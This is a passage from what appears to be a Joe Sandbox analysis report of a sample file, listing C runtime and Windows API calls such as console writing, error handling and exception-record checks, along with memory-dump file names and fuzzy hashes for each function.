                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 158306478-0
                                                              • Opcode ID: be7d3f7ad6c0f327260f4d5aa57d0a773a2d4bbac5f1eddce697c0751690c25b
                                                              • Instruction ID: 76eb2031df55968e76a77348b720b1b2ba147020db223513e269279110712141
                                                              • Opcode Fuzzy Hash: be7d3f7ad6c0f327260f4d5aa57d0a773a2d4bbac5f1eddce697c0751690c25b
                                                              • Instruction Fuzzy Hash: B911A1F250561E7FAB1127B56D8EE7F2D9EEE983987100429FB02D1112FAACDE0146B0
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,00000000,005F112F,00000000,00000000,?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000), ref: 00606EF9
                                                              • GetLastError.KERNEL32(?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000,?,?,?,005F73F7,00000000), ref: 00606F05
                                                                • Part of subcall function 00606ECB: CloseHandle.KERNEL32(FFFFFFFE,00606F15,?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000,?,?), ref: 00606EDB
                                                              • ___initconout.LIBCMT ref: 00606F15
                                                                • Part of subcall function 00606E8D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00606EBC,00602C79,?,?,005F6E1D,?,00000000,00000000,?), ref: 00606EA0
                                                              • WriteConsoleW.KERNEL32(00000000,00000000,005F112F,00000000,?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000,?), ref: 00606F2A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 5b9460b38423809f59eb6487e799fff675203a312a8e8a5a3d1541bc5832f117
                                                              • Instruction ID: 0663181af26663fdaa7d38028af998d3d5ff44d06d34e3414a00212ec8733df1
                                                              • Opcode Fuzzy Hash: 5b9460b38423809f59eb6487e799fff675203a312a8e8a5a3d1541bc5832f117
                                                              • Instruction Fuzzy Hash: A5F01C36480125BBCF222FA5EC049CB3F67EF083A1B148019FA4A86171CA3289209BA1
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 005F268D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: af3159b927e02f09202cb1aa81e0dbf99c80920abb5b0e22f3f464d76123fbd4
                                                              • Instruction ID: cc4570d753fc9706b802fe4c2ae944b5c9c14201989be79d5d4b5755b42fa4cd
                                                              • Opcode Fuzzy Hash: af3159b927e02f09202cb1aa81e0dbf99c80920abb5b0e22f3f464d76123fbd4
                                                              • Instruction Fuzzy Hash: C05159B5A0520E96CB117714CD0737A6F98FB80B00F248D69F795862B9FF3C8C91DA46
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 005EC88F
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 005EC943
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 3480331319-1018135373
                                                              • Opcode ID: deb724825939c21a3e3f53012a7c8e042ed2138f6b16af8a0295f15edcca13b1
                                                              • Instruction ID: be35967bf480df8a6eea380e93d3312dc06a6a573a325394098d72451cf1cf0a
                                                              • Opcode Fuzzy Hash: deb724825939c21a3e3f53012a7c8e042ed2138f6b16af8a0295f15edcca13b1
                                                              • Instruction Fuzzy Hash: 4141E634E003899FCF18DF6AC844A9E7FB5BF45314F148055E895AB392C731EA02CBA1
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005ED187
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: cc4f4c24f669a9c6fd434c5a20bbc1143ce510b17de4fb2520c551bf96a72809
                                                              • Instruction ID: 8035996af9db1fb86f52c86ae66dff4ee157ea3bd3572ae62da9c75ddbb799a8
                                                              • Opcode Fuzzy Hash: cc4f4c24f669a9c6fd434c5a20bbc1143ce510b17de4fb2520c551bf96a72809
                                                              • Instruction Fuzzy Hash: 76416A7690024AAFCF19DF99CC81AEEBFB6BF48304F188199FA4467211D335D950DB60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traitscodecvt
                                                              • String ID:
                                                              • API String ID: 1910604377-3916222277
                                                              • Opcode ID: 5abc7e43ed70ce1aac75992c36b166b220829c2b5d9a484e524e6a915f7d5d73
                                                              • Instruction ID: 3146a55641296c8acfeef0dbb279f202ec03ce2ec6f30f88dc488ebab87edbdc
                                                              • Opcode Fuzzy Hash: 5abc7e43ed70ce1aac75992c36b166b220829c2b5d9a484e524e6a915f7d5d73
                                                              • Instruction Fuzzy Hash: 24318071D00689EFCF18CFA5CA58AEEBBB5BF44304F248099D49167241E7309F05DB90